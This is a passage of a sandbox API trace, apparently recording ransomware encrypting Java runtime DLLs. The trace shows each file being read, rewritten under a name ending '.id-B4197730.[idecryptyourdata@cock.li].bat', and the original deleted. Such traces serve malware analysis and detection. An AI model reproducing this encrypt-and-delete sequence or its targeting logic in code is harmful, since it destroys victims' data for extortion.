[0196.909] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0196.909] lstrlenW (lpString=".xls") returned 4 [0196.910] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0196.910] lstrlenW (lpString=".xlsx") returned 5 [0196.910] lstrcmpiW (lpString1=".xlsx", lpString2="a.exe") returned -1 [0196.910] lstrlenW (lpString=".ppt") returned 4 [0196.910] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0196.910] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java.exe") returned 47 [0196.910] lstrlenW (lpString=".zip") returned 4 [0196.910] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0196.910] lstrlenW (lpString=".rar") returned 4 [0196.910] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0196.910] lstrlenW (lpString=".bz2") returned 4 [0196.910] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0196.910] lstrlenW (lpString=".7z") returned 3 [0196.910] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0196.910] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java.exe") returned 47 [0196.910] lstrlenW (lpString=".dbf") returned 4 [0196.910] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0196.910] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java.exe") returned 47 [0196.910] lstrlenW (lpString=".1cd") returned 4 [0196.910] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0196.910] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java.exe") returned 47 [0196.910] lstrlenW (lpString=".jpg") returned 4 [0196.910] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0196.910] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java.exe") returned 47 [0196.910] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java.exe") returned 47 [0196.910] lstrlenW (lpString=".doc") returned 4 [0196.910] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0196.910] lstrlenW (lpString=".docx") returned 5 [0196.910] lstrcmpiW (lpString1=".docx", lpString2="a.exe") returned -1 [0196.911] lstrlenW (lpString=".pdf") returned 4 [0196.911] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0196.911] lstrlenW (lpString=".xls") returned 4 [0196.911] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0196.911] lstrlenW (lpString=".xlsx") returned 5 [0196.911] lstrcmpiW (lpString1=".xlsx", lpString2="a.exe") returned -1 [0196.911] lstrlenW (lpString=".ppt") returned 4 [0196.911] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0196.911] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java.exe") returned 47 [0196.911] lstrlenW (lpString=".zip") returned 4 [0196.911] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0196.911] lstrlenW (lpString=".rar") returned 4 [0196.911] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0196.911] lstrlenW (lpString=".bz2") returned 4 [0196.911] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0196.911] lstrlenW (lpString=".7z") returned 3 [0196.911] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0196.911] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java.exe") returned 47 [0196.911] lstrlenW (lpString=".dbf") returned 4 [0196.911] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0196.911] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java.exe") returned 47 [0196.911] lstrlenW (lpString=".1cd") returned 4 [0196.911] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0196.911] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java.exe") returned 47 [0196.911] lstrlenW (lpString=".jpg") returned 4 [0196.911] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0196.911] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0196.912] lstrlenW (lpString="javafx_font_t2k.dll") returned 19 [0196.912] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javafx_font_t2k.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\javafx_font_t2k.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0196.912] GetFileSizeEx (in: hFile=0x378, lpFileSize=0x375ff14 | out: lpFileSize=0x375ff14*=538176) returned 1 [0196.912] CloseHandle (hObject=0x378) returned 1 [0196.912] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javafx_font_t2k.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\javafx_font_t2k.dll")) returned 0x20 [0196.912] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javafx_font_t2k.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\javafx_font_t2k.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0196.912] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javafx_font_t2k.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\javafx_font_t2k.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0196.913] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.913] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.913] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javafx_font_t2k.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\javafx_font_t2k.dll.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0196.913] GetLastError () returned 0x0 [0196.913] ReadFile (in: hFile=0x378, lpBuffer=0x415e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x375fecc, lpOverlapped=0x0 | out: lpBuffer=0x415e020*, lpNumberOfBytesRead=0x375fecc*=0x83640, lpOverlapped=0x0) returned 1 [0196.983] WriteFile (in: hFile=0x334, lpBuffer=0x415e020*, nNumberOfBytesToWrite=0x83650, lpNumberOfBytesWritten=0x375fc94, lpOverlapped=0x0 | out: lpBuffer=0x415e020*, lpNumberOfBytesWritten=0x375fc94*=0x83650, lpOverlapped=0x0) returned 1 [0197.233] ReadFile (in: hFile=0x378, lpBuffer=0x415e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x375fecc, lpOverlapped=0x0 | out: lpBuffer=0x415e020*, lpNumberOfBytesRead=0x375fecc*=0x0, lpOverlapped=0x0) returned 1 [0197.233] WriteFile (in: hFile=0x334, lpBuffer=0x415e020*, nNumberOfBytesToWrite=0xfa, lpNumberOfBytesWritten=0x375fc94, lpOverlapped=0x0 | out: lpBuffer=0x415e020*, lpNumberOfBytesWritten=0x375fc94*=0xfa, lpOverlapped=0x0) returned 1 [0197.233] SetEndOfFile (hFile=0x334) returned 1 [0197.233] CloseHandle (hObject=0x334) returned 1 [0197.233] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.233] SetEndOfFile (hFile=0x378) returned 1 [0197.239] CloseHandle (hObject=0x378) returned 1 [0197.239] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javafx_font_t2k.dll.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0197.239] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javafx_font_t2k.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\javafx_font_t2k.dll")) returned 1 [0197.240] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javafx_font_t2k.dll") returned 58 [0197.240] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javafx_font_t2k.dll") returned 58 [0197.240] lstrlenW (lpString=".doc") returned 4 [0197.240] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0197.240] lstrlenW (lpString=".docx") returned 5 [0197.240] lstrcmpiW (lpString1=".docx", lpString2="k.dll") returned -1 [0197.240] lstrlenW (lpString=".pdf") returned 4 [0197.240] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0197.240] lstrlenW (lpString=".xls") returned 4 [0197.240] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0197.240] lstrlenW (lpString=".xlsx") returned 5 [0197.240] lstrcmpiW (lpString1=".xlsx", lpString2="k.dll") returned -1 [0197.240] lstrlenW (lpString=".ppt") returned 4 [0197.240] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0197.240] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javafx_font_t2k.dll") returned 58 [0197.240] lstrlenW (lpString=".zip") returned 4 [0197.240] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0197.240] lstrlenW (lpString=".rar") returned 4 [0197.240] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0197.240] lstrlenW (lpString=".bz2") returned 4 [0197.240] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0197.240] lstrlenW (lpString=".7z") returned 3 [0197.240] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0197.240] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javafx_font_t2k.dll") returned 58 [0197.240] lstrlenW (lpString=".dbf") returned 4 [0197.240] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0197.241] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javafx_font_t2k.dll") returned 58 [0197.241] lstrlenW (lpString=".1cd") returned 4 [0197.241] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0197.241] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javafx_font_t2k.dll") returned 58 [0197.241] lstrlenW (lpString=".jpg") returned 4 [0197.241] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0197.241] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javafx_font_t2k.dll") returned 58 [0197.241] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javafx_font_t2k.dll") returned 58 [0197.241] lstrlenW (lpString=".doc") returned 4 [0197.241] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0197.241] lstrlenW (lpString=".docx") returned 5 [0197.241] lstrcmpiW (lpString1=".docx", lpString2="k.dll") returned -1 [0197.241] lstrlenW (lpString=".pdf") returned 4 [0197.241] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0197.241] lstrlenW (lpString=".xls") returned 4 [0197.241] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0197.241] lstrlenW (lpString=".xlsx") returned 5 [0197.241] lstrcmpiW (lpString1=".xlsx", lpString2="k.dll") returned -1 [0197.241] lstrlenW (lpString=".ppt") returned 4 [0197.241] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0197.241] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javafx_font_t2k.dll") returned 58 [0197.241] lstrlenW (lpString=".zip") returned 4 [0197.241] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0197.241] lstrlenW (lpString=".rar") returned 4 [0197.241] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0197.241] lstrlenW (lpString=".bz2") returned 4 [0197.241] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0197.241] lstrlenW (lpString=".7z") returned 3 [0197.242] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0197.242] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javafx_font_t2k.dll") returned 58 [0197.242] lstrlenW (lpString=".dbf") returned 4 [0197.242] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0197.242] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javafx_font_t2k.dll") returned 58 [0197.242] lstrlenW (lpString=".1cd") returned 4 [0197.242] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0197.242] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javafx_font_t2k.dll") returned 58 [0197.242] lstrlenW (lpString=".jpg") returned 4 [0197.242] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0197.242] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0197.242] lstrlenW (lpString="jdwp.dll") returned 8 [0197.242] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jdwp.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jdwp.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0197.243] GetFileSizeEx (in: hFile=0x378, lpFileSize=0x375ff14 | out: lpFileSize=0x375ff14*=201792) returned 1 [0197.243] CloseHandle (hObject=0x378) returned 1 [0197.243] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jdwp.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jdwp.dll")) returned 0x20 [0197.243] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jdwp.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jdwp.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0197.243] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jdwp.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jdwp.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0197.243] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.243] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.243] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jdwp.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jdwp.dll.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0197.244] GetLastError () returned 0x0 [0197.244] ReadFile (in: hFile=0x378, lpBuffer=0x415e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x375fecc, lpOverlapped=0x0 | out: lpBuffer=0x415e020*, lpNumberOfBytesRead=0x375fecc*=0x31440, lpOverlapped=0x0) returned 1 [0197.365] WriteFile (in: hFile=0x334, lpBuffer=0x415e020*, nNumberOfBytesToWrite=0x31450, lpNumberOfBytesWritten=0x375fc94, lpOverlapped=0x0 | out: lpBuffer=0x415e020*, lpNumberOfBytesWritten=0x375fc94*=0x31450, lpOverlapped=0x0) returned 1 [0197.369] ReadFile (in: hFile=0x378, lpBuffer=0x415e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x375fecc, lpOverlapped=0x0 | out: lpBuffer=0x415e020*, lpNumberOfBytesRead=0x375fecc*=0x0, lpOverlapped=0x0) returned 1 [0197.369] WriteFile (in: hFile=0x334, lpBuffer=0x415e020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x375fc94, lpOverlapped=0x0 | out: lpBuffer=0x415e020*, lpNumberOfBytesWritten=0x375fc94*=0xe4, lpOverlapped=0x0) returned 1 [0197.369] SetEndOfFile (hFile=0x334) returned 1 [0197.369] CloseHandle (hObject=0x334) returned 1 [0197.370] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.370] SetEndOfFile (hFile=0x378) returned 1 [0197.372] CloseHandle (hObject=0x378) returned 1 [0197.372] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jdwp.dll.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0197.372] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jdwp.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jdwp.dll")) returned 1 [0197.372] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jdwp.dll") returned 47 [0197.372] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jdwp.dll") returned 47 [0197.372] lstrlenW (lpString=".doc") returned 4 [0197.372] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0197.372] lstrlenW (lpString=".docx") returned 5 [0197.372] lstrcmpiW (lpString1=".docx", lpString2="p.dll") returned -1 [0197.372] lstrlenW (lpString=".pdf") returned 4 [0197.373] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0197.373] lstrlenW (lpString=".xls") returned 4 [0197.373] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0197.373] lstrlenW (lpString=".xlsx") returned 5 [0197.373] lstrcmpiW (lpString1=".xlsx", lpString2="p.dll") returned -1 [0197.373] lstrlenW (lpString=".ppt") returned 4 [0197.373] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0197.373] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jdwp.dll") returned 47 [0197.373] lstrlenW (lpString=".zip") returned 4 [0197.373] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0197.373] lstrlenW (lpString=".rar") returned 4 [0197.373] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0197.373] lstrlenW (lpString=".bz2") returned 4 [0197.373] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0197.373] lstrlenW (lpString=".7z") returned 3 [0197.373] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0197.373] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jdwp.dll") returned 47 [0197.373] lstrlenW (lpString=".dbf") returned 4 [0197.373] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0197.373] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jdwp.dll") returned 47 [0197.373] lstrlenW (lpString=".1cd") returned 4 [0197.373] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0197.373] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jdwp.dll") returned 47 [0197.373] lstrlenW (lpString=".jpg") returned 4 [0197.373] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0197.373] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jdwp.dll") returned 47 [0197.373] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jdwp.dll") returned 47 [0197.374] lstrlenW (lpString=".doc") returned 4 [0197.374] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0197.374] lstrlenW (lpString=".docx") returned 5 [0197.374] lstrcmpiW (lpString1=".docx", lpString2="p.dll") returned -1 [0197.374] lstrlenW (lpString=".pdf") returned 4 [0197.374] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0197.374] lstrlenW (lpString=".xls") returned 4 [0197.374] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0197.374] lstrlenW (lpString=".xlsx") returned 5 [0197.374] lstrcmpiW (lpString1=".xlsx", lpString2="p.dll") returned -1 [0197.374] lstrlenW (lpString=".ppt") returned 4 [0197.374] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0197.374] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jdwp.dll") returned 47 [0197.374] lstrlenW (lpString=".zip") returned 4 [0197.374] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0197.374] lstrlenW (lpString=".rar") returned 4 [0197.374] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0197.374] lstrlenW (lpString=".bz2") returned 4 [0197.374] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0197.374] lstrlenW (lpString=".7z") returned 3 [0197.374] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0197.374] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jdwp.dll") returned 47 [0197.374] lstrlenW (lpString=".dbf") returned 4 [0197.374] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0197.374] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jdwp.dll") returned 47 [0197.374] lstrlenW (lpString=".1cd") returned 4 [0197.374] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0197.374] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jdwp.dll") returned 47 [0197.374] lstrlenW (lpString=".jpg") returned 4 [0197.375] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0197.375] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0197.375] lstrlenW (lpString="jfxmedia.dll") returned 12 [0197.375] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jfxmedia.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jfxmedia.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0197.383] GetFileSizeEx (in: hFile=0x378, lpFileSize=0x375ff14 | out: lpFileSize=0x375ff14*=139840) returned 1 [0197.383] CloseHandle (hObject=0x378) returned 1 [0197.389] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jfxmedia.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jfxmedia.dll")) returned 0x20 [0197.389] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jfxmedia.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jfxmedia.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0197.389] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jfxmedia.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jfxmedia.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0197.389] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.390] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.390] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jfxmedia.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jfxmedia.dll.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0197.390] GetLastError () returned 0x0 [0197.390] ReadFile (in: hFile=0x378, lpBuffer=0x415e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x375fecc, lpOverlapped=0x0 | out: lpBuffer=0x415e020*, lpNumberOfBytesRead=0x375fecc*=0x22240, lpOverlapped=0x0) returned 1 [0197.396] WriteFile (in: hFile=0x334, lpBuffer=0x415e020*, nNumberOfBytesToWrite=0x22250, lpNumberOfBytesWritten=0x375fc94, lpOverlapped=0x0 | out: lpBuffer=0x415e020*, lpNumberOfBytesWritten=0x375fc94*=0x22250, lpOverlapped=0x0) returned 1 [0197.399] ReadFile (in: hFile=0x378, lpBuffer=0x415e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x375fecc, lpOverlapped=0x0 | out: lpBuffer=0x415e020*, lpNumberOfBytesRead=0x375fecc*=0x0, lpOverlapped=0x0) returned 1 [0197.399] WriteFile (in: hFile=0x334, lpBuffer=0x415e020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x375fc94, lpOverlapped=0x0 | out: lpBuffer=0x415e020*, lpNumberOfBytesWritten=0x375fc94*=0xec, lpOverlapped=0x0) returned 1 [0197.399] SetEndOfFile (hFile=0x334) returned 1 [0197.399] CloseHandle (hObject=0x334) returned 1 [0197.400] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.400] SetEndOfFile (hFile=0x378) returned 1 [0197.401] CloseHandle (hObject=0x378) returned 1 [0197.401] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jfxmedia.dll.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0197.402] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jfxmedia.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jfxmedia.dll")) returned 1 [0197.402] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jfxmedia.dll") returned 51 [0197.402] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jfxmedia.dll") returned 51 [0197.402] lstrlenW (lpString=".doc") returned 4 [0197.402] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0197.402] lstrlenW (lpString=".docx") returned 5 [0197.402] lstrcmpiW (lpString1=".docx", lpString2="a.dll") returned -1 [0197.402] lstrlenW (lpString=".pdf") returned 4 [0197.402] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0197.402] lstrlenW (lpString=".xls") returned 4 [0197.402] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0197.402] lstrlenW (lpString=".xlsx") returned 5 [0197.402] lstrcmpiW (lpString1=".xlsx", lpString2="a.dll") returned -1 [0197.402] lstrlenW (lpString=".ppt") returned 4 [0197.402] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0197.402] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jfxmedia.dll") returned 51 [0197.402] lstrlenW (lpString=".zip") returned 4 [0197.402] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0197.402] lstrlenW (lpString=".rar") returned 4 [0197.402] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0197.402] lstrlenW (lpString=".bz2") returned 4 [0197.402] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0197.403] lstrlenW (lpString=".7z") returned 3 [0197.403] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0197.403] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jfxmedia.dll") returned 51 [0197.403] lstrlenW (lpString=".dbf") returned 4 [0197.403] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0197.403] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jfxmedia.dll") returned 51 [0197.403] lstrlenW (lpString=".1cd") returned 4 [0197.403] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0197.403] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jfxmedia.dll") returned 51 [0197.403] lstrlenW (lpString=".jpg") returned 4 [0197.403] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 